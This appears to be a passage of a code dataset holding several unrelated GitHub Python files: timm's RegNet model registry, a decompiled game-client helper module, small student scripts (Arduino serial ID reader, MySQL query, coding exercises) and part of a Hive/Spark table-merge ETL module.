url='https://download.pytorch.org/models/regnet_y_400mf-e6988f5f.pth'),\n 'regnety_008_tv.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_800mf-58fc7688.pth'),\n 'regnety_016.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_1_6gf-0d7bc02a.pth'),\n 'regnety_032.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_3_2gf-9180c971.pth'),\n 'regnety_080_tv.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_8gf-dc2b1b54.pth'),\n 'regnety_160.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_16gf-3e4a00f9.pth'),\n 'regnety_320.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_32gf-8db6d4b5.pth'),\n\n 'regnety_160.swag_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_16gf_swag-43afe44d.pth', license='cc-by-nc-4.0',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_320.swag_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_32gf_swag-04fdfa75.pth', license='cc-by-nc-4.0',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_1280.swag_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_128gf_swag-c8ce3e52.pth', license='cc-by-nc-4.0',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n\n 'regnety_160.swag_lc_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_16gf_lc_swag-f3ec0043.pth', license='cc-by-nc-4.0'),\n 'regnety_320.swag_lc_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_32gf_lc_swag-e1583746.pth', license='cc-by-nc-4.0'),\n 'regnety_1280.swag_lc_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_y_128gf_lc_swag-cbe8ce12.pth', license='cc-by-nc-4.0'),\n\n 'regnety_320.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet32_finetuned_in1k_model_final_checkpoint_phase78.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_640.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet64_finetuned_in1k_model_final_checkpoint_phase78.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_1280.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet128_finetuned_in1k_model_final_checkpoint_phase78.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n 'regnety_2560.seer_ft_in1k': _cfgtv2(\n hf_hub_id='timm/',\n license='other', origin_url='https://github.com/facebookresearch/vissl',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_regnet256_finetuned_in1k_model_final_checkpoint_phase38.torch',\n input_size=(3, 384, 384), pool_size=(12, 12), crop_pct=1.0),\n\n 'regnety_320.seer': _cfgtv2(\n hf_hub_id='timm/',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet32d/seer_regnet32gf_model_iteration244000.torch',\n num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n 'regnety_640.seer': _cfgtv2(\n hf_hub_id='timm/',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet64/seer_regnet64gf_model_final_checkpoint_phase0.torch',\n num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n 'regnety_1280.seer': _cfgtv2(\n hf_hub_id='timm/',\n url='https://dl.fbaipublicfiles.com/vissl/model_zoo/swav_ig1b_regnet128Gf_cnstant_bs32_node16_sinkhorn10_proto16k_syncBN64_warmup8k/model_final_checkpoint_phase0.torch',\n num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n # FIXME invalid weight <-> model match, mistake on their end\n #'regnety_2560.seer': _cfgtv2(\n # url='https://dl.fbaipublicfiles.com/vissl/model_zoo/swav_ig1b_cosine_rg256gf_noBNhead_wd1e5_fairstore_bs16_node64_sinkhorn10_proto16k_apex_syncBN64_warmup8k/model_final_checkpoint_phase0.torch',\n # num_classes=0, license='other', origin_url='https://github.com/facebookresearch/vissl'),\n\n 'regnetx_002.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_004.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_006.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_008.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_016.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_032.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_040.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_064.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_080.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_120.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_160.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnetx_320.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n\n 'regnety_002.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_004.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_006.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_008.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_016.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_032.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_040.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_064.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_080.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_120.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_160.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n 'regnety_320.pycls_in1k': _cfgpyc(hf_hub_id='timm/'),\n})\n\n\n@register_model\ndef regnetx_002(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-200MF\"\"\"\n return _create_regnet('regnetx_002', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_004(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-400MF\"\"\"\n return _create_regnet('regnetx_004', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_004_tv(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-400MF w/ torchvision group rounding\"\"\"\n return _create_regnet('regnetx_004_tv', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_006(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-600MF\"\"\"\n return _create_regnet('regnetx_006', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_008(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-800MF\"\"\"\n return _create_regnet('regnetx_008', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_016(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-1.6GF\"\"\"\n return _create_regnet('regnetx_016', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_032(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-3.2GF\"\"\"\n return _create_regnet('regnetx_032', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-4.0GF\"\"\"\n return _create_regnet('regnetx_040', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_064(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-6.4GF\"\"\"\n return _create_regnet('regnetx_064', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_080(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-8.0GF\"\"\"\n return _create_regnet('regnetx_080', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_120(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-12GF\"\"\"\n return _create_regnet('regnetx_120', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_160(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-16GF\"\"\"\n return _create_regnet('regnetx_160', pretrained, **kwargs)\n\n\n@register_model\ndef regnetx_320(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetX-32GF\"\"\"\n return _create_regnet('regnetx_320', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_002(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-200MF\"\"\"\n return _create_regnet('regnety_002', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_004(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-400MF\"\"\"\n return _create_regnet('regnety_004', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_006(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-600MF\"\"\"\n return _create_regnet('regnety_006', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_008(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-800MF\"\"\"\n return _create_regnet('regnety_008', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_008_tv(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-800MF w/ torchvision group rounding\"\"\"\n return _create_regnet('regnety_008_tv', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_016(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-1.6GF\"\"\"\n return _create_regnet('regnety_016', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_032(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-3.2GF\"\"\"\n return _create_regnet('regnety_032', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-4.0GF\"\"\"\n return _create_regnet('regnety_040', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_064(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-6.4GF\"\"\"\n return _create_regnet('regnety_064', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_080(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-8.0GF\"\"\"\n return _create_regnet('regnety_080', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_080_tv(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-8.0GF w/ torchvision group rounding\"\"\"\n return _create_regnet('regnety_080_tv', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_120(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-12GF\"\"\"\n return _create_regnet('regnety_120', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_160(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-16GF\"\"\"\n return _create_regnet('regnety_160', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_320(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-32GF\"\"\"\n return _create_regnet('regnety_320', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_640(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-64GF\"\"\"\n return _create_regnet('regnety_640', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_1280(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-128GF\"\"\"\n return _create_regnet('regnety_1280', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_2560(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-256GF\"\"\"\n return _create_regnet('regnety_2560', pretrained, **kwargs)\n\n\n@register_model\ndef regnety_040_sgn(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetY-4.0GF w/ GroupNorm \"\"\"\n return _create_regnet('regnety_040_sgn', pretrained, **kwargs)\n\n\n@register_model\ndef regnetv_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetV-4.0GF (pre-activation)\"\"\"\n return _create_regnet('regnetv_040', pretrained, **kwargs)\n\n\n@register_model\ndef regnetv_064(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetV-6.4GF (pre-activation)\"\"\"\n return _create_regnet('regnetv_064', pretrained, **kwargs)\n\n\n@register_model\ndef regnetz_005(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetZ-500MF\n NOTE: config found in https://github.com/facebookresearch/ClassyVision/blob/main/classy_vision/models/regnet.py\n but it's not clear it is equivalent to paper model as not detailed in the paper.\n \"\"\"\n return _create_regnet('regnetz_005', pretrained, zero_init_last=False, **kwargs)\n\n\n@register_model\ndef regnetz_040(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetZ-4.0GF\n NOTE: config found in https://github.com/facebookresearch/ClassyVision/blob/main/classy_vision/models/regnet.py\n but it's not clear it is equivalent to paper model as not detailed in the paper.\n \"\"\"\n return _create_regnet('regnetz_040', pretrained, zero_init_last=False, **kwargs)\n\n\n@register_model\ndef regnetz_040_h(pretrained=False, **kwargs) -> RegNet:\n \"\"\"RegNetZ-4.0GF\n NOTE: config found in https://github.com/facebookresearch/ClassyVision/blob/main/classy_vision/models/regnet.py\n but it's not clear it is equivalent to paper model as not detailed in the paper.\n \"\"\"\n return _create_regnet('regnetz_040_h', pretrained, zero_init_last=False, **kwargs)\n\n\nregister_model_deprecations(__name__, {\n 'regnetz_040h': 'regnetz_040_h',\n})","repo_name":"huggingface/pytorch-image-models","sub_path":"timm/models/regnet.py","file_name":"regnet.py","file_ext":"py","file_size_in_byte":42958,"program_lang":"python","lang":"en","doc_type":"code","stars":27689,"dataset":"github-code","pt":"76"} +{"seq_id":"6955139528","text":"# 2013.11.15 11:27:07 EST\n# Embedded file name: scripts/client/helpers/__init__.py\nimport BigWorld\nimport ResMgr\nimport Settings\nimport i18n, constants\nfrom debug_utils import LOG_CURRENT_EXCEPTION\nimport material_kinds\n\ndef isPlayerAccount():\n return hasattr(BigWorld.player(), 'databaseID')\n\n\ndef isPlayerAvatar():\n return hasattr(BigWorld.player(), 'arena')\n\n\ndef getClientLanguage():\n \"\"\"\n Return client string of language code\n \"\"\"\n lng = constants.DEFAULT_LANGUAGE\n try:\n lng = i18n.makeString('#settings:LANGUAGE_CODE')\n if not lng.strip() or lng == '#settings:LANGUAGE_CODE' or lng == 'LANGUAGE_CODE':\n lng = constants.DEFAULT_LANGUAGE\n except Exception:\n LOG_CURRENT_EXCEPTION()\n\n return lng\n\n\ndef getClientOverride():\n if constants.IS_KOREA:\n return 'KR'\n elif constants.IS_CHINA:\n return 'CN'\n elif constants.IS_VIETNAM:\n return 'VN'\n else:\n return None\n\n\ndef getLocalizedData(dataDict, key, defVal = ''):\n resVal = defVal\n if dataDict:\n lng = getClientLanguage()\n localesDict = dataDict.get(key, {})\n if localesDict:\n if lng in localesDict:\n resVal = localesDict[lng]\n elif constants.DEFAULT_LANGUAGE in localesDict:\n resVal = localesDict[constants.DEFAULT_LANGUAGE]\n else:\n resVal = localesDict.items()[0][1]\n return resVal\n\n\ndef int2roman(number):\n \"\"\"\n Convert arabic number to roman number\n @param number: int - number\n @return: string - roman number\n \"\"\"\n numerals = {1: 'I',\n 4: 'IV',\n 5: 'V',\n 9: 'IX',\n 10: 'X',\n 40: 'XL',\n 50: 'L',\n 90: 'XC',\n 100: 'C',\n 400: 'CD',\n 500: 'D',\n 900: 'CM',\n 1000: 'M'}\n result = ''\n for value, numeral in sorted(numerals.items(), reverse=True):\n while number >= value:\n result += numeral\n number -= value\n\n return result\n\n\ndef getClientVersion():\n sec = ResMgr.openSection('../version.xml')\n version = i18n.makeString(sec.readString('appname')) + ' ' + sec.readString('version')\n return version\n\n\ndef getClientOverride():\n if constants.IS_KOREA:\n return 'KR'\n elif constants.IS_CHINA:\n return 'CN'\n elif constants.IS_VIETNAM:\n return 'VN'\n else:\n return None\n\n\ndef isShowStartupVideo():\n if not BigWorld.wg_isSSE2Supported():\n return False\n else:\n p = Settings.g_instance.userPrefs\n return p is None or p.readInt(Settings.KEY_SHOW_STARTUP_MOVIE, 1) == 1\n\n\ndef calcEffectMaterialIndex(matKind):\n if matKind != 0:\n return material_kinds.EFFECT_MATERIAL_INDEXES_BY_IDS.get(matKind)\n else:\n effectIndex = -1\n if isPlayerAvatar():\n arenaSpecificEffect = BigWorld.player().arena.arenaType.defaultGroundEffect\n if arenaSpecificEffect is not None:\n if arenaSpecificEffect == 'None':\n return\n if not isinstance(arenaSpecificEffect, int):\n effectIndex = material_kinds.EFFECT_MATERIAL_INDEXES_BY_NAMES.get(arenaSpecificEffect)\n effectIndex = -1 if effectIndex is None else effectIndex\n BigWorld.player().arena.arenaType.defaultGroundEffect = effectIndex\n else:\n effectIndex = arenaSpecificEffect\n return effectIndex\n return\n# okay decompyling res/scripts/client/helpers/__init__.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2013.11.15 11:27:07 EST\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/client/helpers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"30367196691","text":"import serial\nimport time\nimport sqlite3\n\nconn = sqlite3.connect('data.db')\nfrom random import randint\nimport UseDatabase\n\nc = conn.cursor()\n\nCOMPOORT = int(input(\"De Arduino is aangesloten op COM-poort \"))\n\nser = serial.Serial(COMPOORT - 1)\nkey = randint(10000, 90000)\nkey2 = int(key/1000)\nkey3 = int(key/100)\nkey4 = int(key/10)\n\n\ndef decrypt(userid):\n return userid + int(key4 - key2)*int(key - key3)\n\n\ndef readArduino():\n while ser.readline().strip() != b'test':\n time.sleep(1)\n\n ser.write(str(key).encode())\n s = ser.readline().strip()\n userid = decrypt(int(s))\n return userid","repo_name":"Projectgroep-18/Beveiligde-Pasjes","sub_path":"python_code_for_reading_uid.py","file_name":"python_code_for_reading_uid.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7638117083","text":"#!/usr/bin/python3\n\"\"\" Import the sys.arg \"\"\"\nimport MySQLdb\nimport sys\n\nif __name__ == \"__main__\":\n # Database Conection\n db = MySQLdb.connect(host=\"localhost\",\n port=3306,\n user=sys.argv[1],\n passwd=sys.argv[2],\n db=sys.argv[3])\n\n cur = db.cursor()\n\n cur.execute(\"SELECT cities.name FROM cities LEFT JOIN states\\\n ON states.id = cities.state_id WHERE states.name = %s\\\n ORDER BY cities.id ASC;\", (sys.argv[4],))\n\n query = cur.fetchall()\n list_a = []\n for element in query:\n list_a.append(element[0])\n result = \", \".join(list_a)\n print(result)\n\n cur.close()\n db.close()\n","repo_name":"gomba66/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37242578587","text":"#!/usr/bin/env python\n#imports\nimport pubchempy as pcp\nimport pandas as pd\nimport numpy as np\n\n#remove duplicates function\ndef remove_duplicates_molconvert(file):\n\n\t'''Function that removes duplicates from a textfile \n\n\tInput: \n\t\tDescription: a textfile (.txt) with all chemical names outputted by molconvert\n\t\tFile type: textfile(.TXT)\n\t\texample: names_mol.txt\n\t\n\tReturns: a textfile(.txt) with chemical names and duplicates are removed'''\n\n\t#with open file, read lines and make a list\n\twith open(file) as f:\n\t\tcontent = f.readlines()\n\tcontent = [x.strip() for x in content]\n\tprint(content)\n\t#initialize new list\n\tnew_list = []\n\t#loop through the content list\n\tfor compound in content:\n\t\tprint(compound)\n\t\t#remove duplicates,\n\t\tif compound not in new_list:\n\t\t\t#append it to the list\n\t\t\tnew_list.append(compound)\n\n\tprint(new_list)\n\t#open a new textfile and write each item in list to textfile\n\twith open(\"final_mol.txt\",\"w\") as textfile:\n\t\tfor i in new_list:\n\t\t\ttextfile.write(i + \"\\n\")\n\t\ttextfile.close()\n\n'''file = \"names_mol.txt\"\n#run function\nremove_duplicates(file)'''","repo_name":"muthuku/polyname","sub_path":"molconvert/remove_duplicates_function.py","file_name":"remove_duplicates_function.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12711193461","text":"\"\"\"\nWrite a function that has two parameters: orders and cost. Return any orders that are greater than the cost.\n\nExamples\nexpensive_orders({ \"a\": 3000, \"b\": 200, \"c\": 1050 }, 1000)\n➞ { \"a\": 3000, \"c\": 1050 }\n\nexpensive_orders({ \"Gucci Fur\": 24600, \"Teak Dining Table\": 3200, \"Louis Vutton Bag\": 5550, \"Dolce Gabana Heels\": 4000 }, 20000)\n➞ { \"Gucci Fur\": 24600 }\n\nexpensive_orders({ \"Deluxe Burger\": 35, \"Icecream Shake\": 4, \"Fries\": 5 }, 40)\n➞ {}\n\"\"\"\n\ndef expensive_orders(orders, cost):\n\n # return {key: val for key, val in orders.items() if val > cost}\n\n result = {}\n for key, value in orders.items():\n if value > cost:\n result[key] = value\n return result\n\n\nprint(expensive_orders({\"a\": 3000, \"b\": 200, \"c\": 1050}, 1000))\nprint(expensive_orders({ \"Gucci Fur\": 24600, \"Teak Dining Table\": 3200, \"Louis Vutton Bag\": 5550, \"Dolce Gabana Heels\": 4000 }, 20000))\nprint(expensive_orders({ \"Deluxe Burger\": 35, \"Icecream Shake\": 4, \"Fries\": 5 }, 40))\n\n\n\n","repo_name":"kazuhiko1979/edabit","sub_path":"062_normal_Expensive Orders.py","file_name":"062_normal_Expensive Orders.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"23822327156","text":"import sys\nimport re\nimport logging\nimport subprocess\nimport errno, os, pty\nimport shlex\nfrom subprocess import Popen, PIPE\nfrom ConfigReader import configuration\nimport mysql.connector\nfrom mysql.connector import errorcode\nfrom common.Singleton import Singleton\nfrom common import constants as constant\nfrom DBImportConfig import import_config\nfrom DBImportOperation import import_operations\nfrom DBImportOperation import common_operations\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nimport time\n\nclass operation(object, metaclass=Singleton):\n\tdef __init__(self, Hive_DB=None, Hive_Table=None):\n\t\tlogging.debug(\"Executing etl_operations.__init__()\")\n\t\tself.Hive_DB = None\n\t\tself.Hive_Table = None\n\t\tself.mysql_conn = None\n\t\tself.mysql_cursor = None\n\t\tself.startDate = None\n\n\t\tself.common_operations = common_operations.operation(Hive_DB, Hive_Table)\n\t\tself.import_operations = import_operations.operation(Hive_DB, Hive_Table)\n\t\tself.import_config = import_config.config(Hive_DB, Hive_Table)\n\n\t\tif Hive_DB != None and Hive_Table != None:\n\t\t\tself.setHiveTable(Hive_DB, Hive_Table)\n\t\telse:\n\t\t\t# If the class already is initialized, we just pull the parameters and set them here\n\t\t\tself.Hive_DB = self.common_operations.Hive_DB\n\t\t\tself.Hive_Table = self.common_operations.Hive_Table\n\t\t\tself.startDate = self.import_config.startDate\n\n\t\tlogging.debug(\"Executing etl_operations.__init__() - Finished\")\n\n\tdef setHiveTable(self, Hive_DB, Hive_Table):\n\t\t\"\"\" Sets the parameters to work against a new Hive database and table \"\"\"\n\t\tself.Hive_DB = Hive_DB.lower()\n\t\tself.Hive_Table = Hive_Table.lower()\n\n\t\tself.common_operations.setHiveTable(self.Hive_DB, self.Hive_Table)\n\t\tself.import_config.setHiveTable(self.Hive_DB, self.Hive_Table)\n\n\t\ttry:\n\t\t\tself.import_config.getImportConfig()\n\t\t\tself.startDate = self.import_config.startDate\n\t\t\tself.import_config.lookupConnectionAlias()\n\t\texcept:\n\t\t\tself.import_config.remove_temporary_files()\n\t\t\tsys.exit(1)\n\n\tdef remove_temporary_files(self):\n\t\tself.import_config.remove_temporary_files()\n\n\tdef connectToHive(self,):\n\t\tlogging.debug(\"Executing etl_operations.connectToHive()\")\n\n\t\ttry:\n\t\t\tself.common_operations.connectToHive()\n\t\texcept Exception as ex:\n\t\t\tlogging.error(ex)\n\t\t\tself.import_config.remove_temporary_files()\n\t\t\tsys.exit(1)\n\n\t\tlogging.debug(\"Executing etl_operations.connectToHive() - Finished\")\n\n\tdef executeSQLQuery(self, query):\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_HIVE:\n\t\t\tself.common_operations.executeHiveQuery(query)\n\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_SPARK:\n\t\t\tself.import_operations.spark.sql(query)\n\n\tdef mergeHiveTables(self, sourceDB, sourceTable, targetDB, targetTable, historyDB = None, historyTable=None, targetDeleteDB = None, targetDeleteTable=None, createHistoryAudit=False, sourceIsIncremental=False, sourceIsImportTable=False, softDelete=False, mergeTime=datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'), datalakeSource=None, PKColumns=None, hiveMergeJavaHeap=None, oracleFlashbackSource=False, mssqlChangeTrackingSource=False, oracleFlashbackImportTable=None, mssqlChangeTrackingImportTable=None, ChangeDataTrackingInitialLoad=False):\n\t\t\"\"\" Merge source table into Target table. Also populate a History Audit table if selected \"\"\"\n\t\tlogging.debug(\"Executing etl_operations.mergeHiveTables()\")\n\n\t\ttargetColumns = self.common_operations.getHiveColumns(hiveDB=targetDB, hiveTable=targetTable, includeType=False, includeComment=False)\n\t\tcolumnMerge = self.common_operations.getHiveColumnNameDiff(sourceDB=sourceDB, sourceTable=sourceTable, targetDB=targetDB, targetTable=targetTable, importTool = self.import_config.importTool, sourceIsImportTable=True)\n\t\tif PKColumns == None:\n\t\t\tPKColumns = self.common_operations.getPKfromTable(hiveDB=targetDB, hiveTable=targetTable, quotedColumns=False)\n\n\t\tsourceDBandTable = \"`%s`.`%s`\"%(sourceDB, sourceTable)\n\t\ttargetDBandTable = \"`%s`.`%s`\"%(targetDB, targetTable)\n\t\thistoryDBandTable = \"`%s`.`%s`\"%(historyDB, historyTable)\n\t\ttargetDeleteDBandTable = \"`%s`.`%s`\"%(targetDeleteDB, targetDeleteTable)\n\t\toracleFlashbackImportDBandTable = \"`%s`.`%s`\"%(sourceDB, oracleFlashbackImportTable)\n\t\tmssqlChangeTrackingImportDBandTable = \"`%s`.`%s`\"%(sourceDB, mssqlChangeTrackingImportTable)\n\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_SPARK:\n\t\t\tsourceDBandTable = \"hive.%s\"%(sourceDBandTable)\n\t\t\ttargetDBandTable = \"hive.%s\"%(targetDBandTable)\n\t\t\thistoryDBandTable = \"hive.%s\"%(historyDBandTable)\n\t\t\ttargetDeleteDBandTable = \"hive.%s\"%(targetDeleteDBandTable)\n\t\t\toracleFlashbackImportDBandTable = \"hive.%s\"%(oracleFlashbackImportDBandTable)\n\t\t\tmssqlChangeTrackingImportDBandTable = \"hive.%s\"%(mssqlChangeTrackingImportDBandTable)\n\t\t\tself.import_operations.startSpark()\n\n\t\tdatalakeIUDExists = False\n\t\tdatalakeInsertExists = False\n\t\tdatalakeUpdateExists = False\n\t\tdatalakeDeleteExists = False\n\t\tdatalakeSourceExists = False\n\n\t\tfor index, row in targetColumns.iterrows():\n\t\t\tif row['name'] == \"datalake_iud\": datalakeIUDExists = True \n\t\t\tif row['name'] == \"datalake_insert\": datalakeInsertExists = True \n\t\t\tif row['name'] == \"datalake_update\": datalakeUpdateExists = True \n\t\t\tif row['name'] == \"datalake_delete\": datalakeDeleteExists = True \n\t\t\tif row['name'] == \"datalake_source\": datalakeSourceExists = True \n\n\t\tif self.import_config.etlEngine == constant.ETL_ENGINE_HIVE:\n\t\t\tif hiveMergeJavaHeap != None:\n\t\t\t\tquery = \"set hive.tez.container.size=%s\"%(hiveMergeJavaHeap)\n\t\t\t\tself.common_operations.executeHiveQuery(query)\n\n\t\tprintSQLQuery = False\n\n\t\tquery = \"merge into %s as T \\n\"%(targetDBandTable)\n\t\tquery += \"using %s as S \\n\"%(sourceDBandTable)\n\t\tquery += \"on \\n\"\n\n\t\tfor i, targetColumn in enumerate(PKColumns.split(\",\")):\n\t\t\ttry:\n\t\t\t\tsourceColumn = columnMerge.loc[columnMerge['Exist'] == 'both'].loc[columnMerge['targetName'] == targetColumn].iloc[0]['sourceName']\n\t\t\texcept IndexError:\n\t\t\t\tlogging.error(\"Primary Key cant be found in the source target table. Please check PK override\")\n\t\t\t\tself.import_config.remove_temporary_files()\n\t\t\t\tsys.exit(1)\n\n\t\t\tif sourceColumn == None:\n\t\t\t\tlogging.error(\"ERROR: Problem determine column name in source table for primary key column '%s'\"%(targetColumn))\n\t\t\t\tself.import_config.remove_temporary_files()\n\t\t\t\tsys.exit(1)\n\n\t\t\tif i == 0: 